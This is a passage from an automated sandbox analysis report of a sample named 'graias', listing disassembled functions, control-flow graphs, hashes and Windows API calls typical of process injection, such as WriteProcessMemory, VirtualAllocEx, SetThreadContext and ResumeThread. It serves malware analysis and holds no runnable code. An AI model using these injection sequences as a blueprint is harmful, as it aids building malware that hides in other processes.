                                                                                                                                                                                              • Opcode Fuzzy Hash: 7bacae7cae5c2172091cecbdad10858e2d4193996eee0afe2e841c829d911e73
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1241D2B0C0071DCBDB24DFA9C884ADEBBB6BF49304F24806AD509BB255EB756945CF90
                                                                                                                                                                                              Function 013B58F3 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 703 13b58f3-13b59b9 CreateActCtxA 705 13b59bb-13b59c1 703->705 706 13b59c2-13b5a1c 703->706 705->706 713 13b5a2b-13b5a2f 706->713 714 13b5a1e-13b5a21 706->714 715 13b5a31-13b5a3d 713->715 716 13b5a40 713->716 714->713 715->716 717 13b5a41 716->717 717->717
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 013B59A9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1850566839.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_13b0000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                              • Opcode ID: 8197671a50b251b6689d9c5a882157c94db8beb7068949b895f2d20de13a2f76
                                                                                                                                                                                              • Instruction ID: 7745a937e8b2724f436944f1c8022858f048027415c9429c52fc5cba042bed4d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8197671a50b251b6689d9c5a882157c94db8beb7068949b895f2d20de13a2f76
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7941C1B0C00719CEEB24DFA9C884BDDBBB6BF49304F24806AD509AB255EB756945CF90
                                                                                                                                                                                              Function 07830459 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 719 7830459-783045a 720 7830461-7830464 719->720 721 783045c-783045e 719->721 723 7830465-78304ae 720->723 722 7830460 721->722 721->723 722->720 725 78304b0-78304bc 723->725 726 78304be-78304fd WriteProcessMemory 723->726 725->726 728 7830506-7830536 726->728 729 78304ff-7830505 726->729 729->728
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078304F0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7830000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                                                              • Opcode ID: 049554db287c96da624e7b9342dd816fb57f7cd486aba450ec273cae81a2608b
                                                                                                                                                                                              • Instruction ID: d0a57ff8085c15a83ff034868cd8d68349a318de689b892a8c7c0c7e6e0c0755
                                                                                                                                                                                              • Opcode Fuzzy Hash: 049554db287c96da624e7b9342dd816fb57f7cd486aba450ec273cae81a2608b
                                                                                                                                                                                              • Instruction Fuzzy Hash: BD2157B19003599FDB10CFADC884BDEBBF1FF48314F10842AE559A7250C7789544CBA4
                                                                                                                                                                                              Function 07830460 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 733 7830460-78304ae 737 78304b0-78304bc 733->737 738 78304be-78304fd WriteProcessMemory 733->738 737->738 740 7830506-7830536 738->740 741 78304ff-7830505 738->741 741->740
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078304F0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7830000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                                                              • Opcode ID: 8328792dcc649ed9f3b06b1ee270910c08f2871df4ceb16645b64409e145e065
                                                                                                                                                                                              • Instruction ID: 77b4c530a2c9c01e28306bc3f0607ea6e398dda25177c485f1815ceb8ceb0763
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8328792dcc649ed9f3b06b1ee270910c08f2871df4ceb16645b64409e145e065
                                                                                                                                                                                              • Instruction Fuzzy Hash: 242125B19003599FDB10CFAAC885BDEBBF5FF48324F10842AE959A7250C7789944CBA4
                                                                                                                                                                                              Function 07830548 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 745 7830548-783054a 746 7830551-78305dd ReadProcessMemory 745->746 747 783054c-783054f 745->747 750 78305e6-7830616 746->750 751 78305df-78305e5 746->751 747->746 751->750
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 078305D0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7830000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1726664587-0
                                                                                                                                                                                              • Opcode ID: c4c70434e85072afd2c39e072b994103075ad68dbbe860c8562c0029751d5eee
                                                                                                                                                                                              • Instruction ID: 7e5c60edd2f66b7fce96d289a51fd9cd54e5e467d50e47127f10bfd0ceac62d7
                                                                                                                                                                                              • Opcode Fuzzy Hash: c4c70434e85072afd2c39e072b994103075ad68dbbe860c8562c0029751d5eee
                                                                                                                                                                                              • Instruction Fuzzy Hash: BC2166B1C002599FCB10CFA9C881BEEBBF1FF48320F10842AE559A7250C7789941CBA0
                                                                                                                                                                                              Function 078302C0 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 755 78302c0-78302c6 756 78302c8-78302cc 755->756 757 78302cd-7830313 755->757 756->757 759 7830323-7830353 Wow64SetThreadContext 757->759 760 7830315-7830321 757->760 762 7830355-783035b 759->762 763 783035c-783038c 759->763 760->759 762->763
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07830346
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7830000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                                                              • Opcode ID: f72ceeaa0225cc9494fbf2092b30650ff85f54989de589d9e44c9a2654095f40
                                                                                                                                                                                              • Instruction ID: 2babee15ba6d16b90bf36dc67a5ea913aac044aa3b9b23ed4a613d6b05235696
                                                                                                                                                                                              • Opcode Fuzzy Hash: f72ceeaa0225cc9494fbf2092b30650ff85f54989de589d9e44c9a2654095f40
                                                                                                                                                                                              • Instruction Fuzzy Hash: 642168B19003099FDB10DFAEC584BEEBBF5EF48324F108429D459A7241C778A944CFA5
                                                                                                                                                                                              Function 078302C8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 767 78302c8-7830313 770 7830323-7830353 Wow64SetThreadContext 767->770 771 7830315-7830321 767->771 773 7830355-783035b 770->773 774 783035c-783038c 770->774 771->770 773->774
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07830346
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7830000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                                                              • Opcode ID: d6d8260dcada9f54cdb709c2afa60ef6be8713e80e630c4ec19a30544922938a
                                                                                                                                                                                              • Instruction ID: 97eff09deea74a06f97e32fd07bad014454cb2d41928507309512a0105fe41a5
                                                                                                                                                                                              • Opcode Fuzzy Hash: d6d8260dcada9f54cdb709c2afa60ef6be8713e80e630c4ec19a30544922938a
                                                                                                                                                                                              • Instruction Fuzzy Hash: BB2138B19003098FDB10DFAAC5857EEBBF5EF48324F148429D559A7240C7789945CFA5
                                                                                                                                                                                              Function 07830550 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 778 7830550-78305dd ReadProcessMemory 782 78305e6-7830616 778->782 783 78305df-78305e5 778->783 783->782
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 078305D0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7830000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1726664587-0
                                                                                                                                                                                              • Opcode ID: 61c82d662dffaf31ebf8513059c810863e62507d4f1a1282a68e225ec0d66c50
                                                                                                                                                                                              • Instruction ID: c901c1ee9f916fb1d6f8968e5da612564e3baee55aec31740f47ff32a807c2a2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 61c82d662dffaf31ebf8513059c810863e62507d4f1a1282a68e225ec0d66c50
                                                                                                                                                                                              • Instruction Fuzzy Hash: 622125B18002599FCB10DFAAC881AEEFBF5FF48320F10842AE559A7250C7789944CBA4
                                                                                                                                                                                              Function 013BDCA8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 787 13bdca8-13bdd3c DuplicateHandle 788 13bdd3e-13bdd44 787->788 789 13bdd45-13bdd62 787->789 788->789
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013BDD2F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1850566839.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_13b0000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                                                              • Opcode ID: 65523baab2efa89f58dd73109ee72b5f537e2d6466af2ae5345697995f2953b8
                                                                                                                                                                                              • Instruction ID: c20c983bd30f33a0de7ccc29a22bcde8e463203c8049185ddab51c926c420f0e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 65523baab2efa89f58dd73109ee72b5f537e2d6466af2ae5345697995f2953b8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C21E4B59002589FDB10CF9AD984ADEFFF4EB48324F14841AE954A7310D374A944CFA4
                                                                                                                                                                                              Function 07830398 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0783040E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7830000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                              • Opcode ID: 237cac123aa3bc6d314543a8b4c2ed397b9dc22be40e0a4c1a93c5427522f2b6
                                                                                                                                                                                              • Instruction ID: c116cd4c5125ea69338ca7202e924fa2c6dd1739fa94e646bde65c10871e9148
                                                                                                                                                                                              • Opcode Fuzzy Hash: 237cac123aa3bc6d314543a8b4c2ed397b9dc22be40e0a4c1a93c5427522f2b6
                                                                                                                                                                                              • Instruction Fuzzy Hash: AA1197B28002489FDB10DFAAC844BDFBFF5EF88324F208819E559A7250C775A540CFA0
                                                                                                                                                                                              Function 078303A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0783040E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7830000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                              • Opcode ID: 65474056b62083a6afbdc5b2a6cb7d7598170d00e8cf699ac400df869c119a1b
                                                                                                                                                                                              • Instruction ID: 3f7ccf178d49bc561ea05da6d30122d7334a637b9c4d179e3456aef1c11f9ba2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 65474056b62083a6afbdc5b2a6cb7d7598170d00e8cf699ac400df869c119a1b
                                                                                                                                                                                              • Instruction Fuzzy Hash: E71137B19002499FDB10DFAAC844BDEBFF5EF88324F108819E559A7250C775A544CFA4
                                                                                                                                                                                              Function 07830210 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7830000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                                                              • Opcode ID: 9f9f6b68c70c87cf349138f8a1a6bed75dc303cd0ea02f054000f68f54047b4a
                                                                                                                                                                                              • Instruction ID: e70d23b922c057ba8cd8cf9bb818007193b1def7eac01e226522968841a44724
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f9f6b68c70c87cf349138f8a1a6bed75dc303cd0ea02f054000f68f54047b4a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 851158B19002488FDB24DFAEC444BDEFBF5AB88324F208819D559A7250C775A945CF94
                                                                                                                                                                                              Function 07830218 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7830000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                                                              • Opcode ID: d84c8974dd9538d51c3bf88f9d030f1b6b144609196a0f3ea49de97ae3f2afad
                                                                                                                                                                                              • Instruction ID: 84851f139474055e83fa0a9f643ea720b77a45d22b0794f32f4075698bf459ed
                                                                                                                                                                                              • Opcode Fuzzy Hash: d84c8974dd9538d51c3bf88f9d030f1b6b144609196a0f3ea49de97ae3f2afad
                                                                                                                                                                                              • Instruction Fuzzy Hash: 781125B19002598FDB20DFAAC445BDEFBF5AB88324F208829D559A7250CB75A944CFA4
                                                                                                                                                                                              Function 07832EF9 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 07832F5D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7830000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessagePost
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                                                                              • Opcode ID: e7882d260e9505546bf88b51e4149c8c5f6a62c10214ae854e6be1dc3da6c8cc
                                                                                                                                                                                              • Instruction ID: e8ed390addea0f7bcdea2926980531cfe459cad5e589edc9c9de27801bbf5b87
                                                                                                                                                                                              • Opcode Fuzzy Hash: e7882d260e9505546bf88b51e4149c8c5f6a62c10214ae854e6be1dc3da6c8cc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F1122B58002499FDB20DF9AC889BDEBFF8FB58320F20845AE558A7200C375A544CFA5
                                                                                                                                                                                              Function 013BB9B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 013BBA1E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1850566839.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_13b0000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                                              • Opcode ID: 3f886ec17efd6e71e477cfdbb6f20e2f2a9d2a712bed13aeffb4667c4c4869cb
                                                                                                                                                                                              • Instruction ID: 951238f1515227d3ed4dcf82670d9313a83ca8245f6dae175a6dc1eb1cfd2a68
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f886ec17efd6e71e477cfdbb6f20e2f2a9d2a712bed13aeffb4667c4c4869cb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 771110B5C002498FDB20CF9AC484ADEFBF4AB88324F10842AD959B7610D775A545CFA1
                                                                                                                                                                                              Function 013BB9B7 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 013BBA1E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1850566839.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_13b0000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                                              • Opcode ID: b2491f6a9502290c237f31e368918723ba6d93db1970c886e3acbb8ae452b89a
                                                                                                                                                                                              • Instruction ID: 123e065ef0e2ce22b61ce172348f96744db2773f2e1af6df4bf25b50d4e230f7
                                                                                                                                                                                              • Opcode Fuzzy Hash: b2491f6a9502290c237f31e368918723ba6d93db1970c886e3acbb8ae452b89a
                                                                                                                                                                                              • Instruction Fuzzy Hash: E21110B6C002498FDB20CF9AC584BDEFBF4AF48224F10841AC559B7614D374A545CFA0
                                                                                                                                                                                              Function 07832F00 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 07832F5D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7830000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessagePost
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                                                                              • Opcode ID: 5f866b56b99f6e8fc735fbf077ee6f48db74e7691e9f572283dac391e0cabcc8
                                                                                                                                                                                              • Instruction ID: cf203e6f1680b03753163aa46df358761e1da59c8eb6a316161c2275ca84466d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f866b56b99f6e8fc735fbf077ee6f48db74e7691e9f572283dac391e0cabcc8
                                                                                                                                                                                              • Instruction Fuzzy Hash: DA1103B58003499FDB20DF9AC884BDEBBF8FB48320F10841AE558A7200C375A544CFA5
                                                                                                                                                                                              Function 0135D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1848925547.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_135d000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 63c780536816bc41141da11d278a1818f180b8ba97a85ca5758953ca56c6c730
                                                                                                                                                                                              • Instruction ID: cd2d6142a2312f70337e7fd9903361fbc13a51d92062228ea1789091cef3b67e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 63c780536816bc41141da11d278a1818f180b8ba97a85ca5758953ca56c6c730
                                                                                                                                                                                              • Instruction Fuzzy Hash: 422145B1100204DFDB05DF48D9C0F66BF69FB88728F20C169ED0A1F256C73AE446CAA2
                                                                                                                                                                                              Function 0135D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1848925547.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_135d000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0272f5d87cace8d34f0b1df9ce90c13459a7aa73c07102192e55acef3514c0b0
                                                                                                                                                                                              • Instruction ID: b0a9f46b02944fb82c1ac519e82dec664bdb1bb64849972fe17c0d8ccccf6b60
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0272f5d87cace8d34f0b1df9ce90c13459a7aa73c07102192e55acef3514c0b0
                                                                                                                                                                                              • Instruction Fuzzy Hash: D82122B1500244DFDB46DF98D9C0F2ABF65FB88B1CF20C969ED094B256C336D456CAA2
                                                                                                                                                                                              Function 0136D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1849343648.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_136d000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 1e60aaac98bc05f1c4c2646aa585b22e54bdc936f3ba1a6a0bcc7965b9c741ea
                                                                                                                                                                                              • Instruction ID: da978cb5a687dc81b0a90118410b493fde5a475328e1c12a1d8d792692a74d65
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e60aaac98bc05f1c4c2646aa585b22e54bdc936f3ba1a6a0bcc7965b9c741ea
                                                                                                                                                                                              • Instruction Fuzzy Hash: F9214971604204DFDB01DF98D5C0B26BBA9FB84328F24C56DD8894B35AC376D446CA61
                                                                                                                                                                                              Function 0136D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1849343648.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_136d000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ab44fe2c28a2211e9bb0077d1d60150dcc8e48cd1b21f9143a624fdb1720ed54
                                                                                                                                                                                              • Instruction ID: a1c59ffb96c9b1cc01344cbb5ac3649d9b57e289a5145608920634a287bdf2d9
                                                                                                                                                                                              • Opcode Fuzzy Hash: ab44fe2c28a2211e9bb0077d1d60150dcc8e48cd1b21f9143a624fdb1720ed54
                                                                                                                                                                                              • Instruction Fuzzy Hash: 46212271604204DFCB15DF58D984B26BFA9FB88318F20C56DE88A4B25AC33BD447CAA1
                                                                                                                                                                                              Function 0135D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1848925547.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_135d000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                              • Instruction ID: ab70486e1774aa029113ffab462252317e64b135cdc7ce6b19545c19f6d54438
                                                                                                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                              • Instruction Fuzzy Hash: AB11E172404280CFCB02CF54D5C4B16BF71FB84718F24C6A9DC090B256C336D45ACBA1
                                                                                                                                                                                              Function 0135D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
